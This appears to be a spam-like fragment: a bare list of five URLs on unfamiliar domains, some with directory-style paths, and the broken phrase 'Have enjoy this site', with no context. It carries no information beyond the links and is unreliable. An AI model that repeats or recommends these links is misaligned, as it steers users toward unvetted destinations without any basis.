-http://www.kemeh.com/c_tpls

-http://www.s-60.org/guest/media

-http://www.b-j.info/bak

-http://www.rapidcat.us/

Have enjoy this site

-http://kosong.biz/rapid/